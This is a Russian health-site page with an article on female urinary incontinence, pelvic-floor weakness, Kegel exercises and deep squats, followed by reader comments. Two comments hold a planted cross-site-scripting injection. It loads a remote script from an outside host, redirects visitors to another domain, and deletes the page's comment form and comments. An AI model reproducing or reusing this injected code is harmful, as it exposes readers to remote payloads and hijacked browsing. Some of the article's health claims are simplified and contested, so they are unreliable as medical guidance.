Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как научиться терпеть  >>  Как научиться терпеть
 
Обратная связь
 

Как научиться терпеть

Размер шрифта
19 марта 2014 00:00
  • google_analytics: false
  • Нравится

Выделение мочи во время кашля, чихания или смеха говорит о нарушении функции мышц тазового дна. Наша статья поможет вам разобраться в этой проблеме.

Как научиться терпеть

Недержание мочи наблюдается не только у бабушек, но и у молодых женщин и является симптомом нарушения функции мышц тазового дна. Помимо недержания мочи может  наблюдаться боль и жжение. Выраженное нарушение функции мышц тазового дна может привести к выпадению влагалища и матки.  

В группу риска входят не только люди, ведущие малоподвижный образ жизни, но даже спортсмены. Все дело в том, что мы слишком много сидим. Согласно современным представлениям, женщины неправильно пользуются своим телом. Более того, упражнения Кегеля, которые традиционно считались спасением от недержания мочи, оказывается, могут его спровоцировать.

Как понять, что есть недержание

К врачу следует обратиться в том случае, если вы бежите в туалет через 10 минут после того, как выпили воды, или частое мочеиспускание нарушает вашу повседневную жизнь.

В чем причина недержания

Недержание мочи может появиться у молодой женщины после рождения ребенка или в пожилом возрасте. Причиной недержания мочи является ослабление мышц тазового дна, которые реагируют на количество и качество движений. Имеет значение даже не сам факт того, что мы сидим, а то, как мы сидим.

У кого чаще бывает недержание

У женщин недержание мочи встречается несколько чаще, чем у мужчин. Возможно, это обусловлено тем, что женщины чаще обращаются к врачу. Кроме того, у мужчин мышцы тазового дна более сильные, чем у женщин. Нарушение функции мышц тазового дна чаще наблюдается не у бабушек, а у рожавших женщин спортивного телосложения чуть старше 30 лет.

В какие моменты проявляется недержание

Недержание мочи чаще всего проявляется при резком повышении внутрибрюшного давления: при смехе, чихании, кашле или при переходе из положения лежа в положение сидя.

Почему проблема актуальна

Манеру движений мы наследуем точно так же, как и манеру говорить. Мы привыкли подавать копчик вперед,  в результате чего мы заваливаемся вперед вместо того, чтобы тянуться назад. В итоге увеличивается риск нарушений функции мышц тазового дна. Кроме того, многие уверены, что упражнения Кегеля и правильное питание защищают от подобных нарушений, однако, это совсем не так.

Что такое упражнения Кегеля

Существует три зоны, которые задействованы при выполнении упражнений Кегеля: зона, где находится мочеиспускательный канал, влагалище и прямая кишка.

Как укрепить мышцы тазового дна

Для укрепления мышц тазового дна требуется не только их сокращение, но и растяжение. Для растяжения мышц тазового дна отлично подходят глубокие приседания. Поэтому упражнения Кегеля необходимо выполнять сидя на корточках – только так удается достичь одновременного сокращения и растяжения. Глубокие приседания следует выполнять три раза в день.

Как еще можно справиться с недержанием

  • Уменьшить потребление кофеина, поскольку он раздражает мочевой пузырь
  • Не ограничивать потребление жидкости
  • Не выполнять упражнения, повышающие внутрибрюшное давление
  • Растягивать заднюю поверхность бедер, если вам долго приходится сидеть
  • Не носить высокие каблуки

Узнайте все о женском здоровье в нашем специальном проекте!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:44

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Задохнетесь ли вы от астмы?   Все что надо знать о бронхите   Ученые выяснили, что случится с вами, если вас удалят из друзей Вконтакте!   Вся правда о соплях  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Как не описаться?! Мифы о мочевом пузыре!
Как не описаться
Астма! Когда бежать к врачу?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.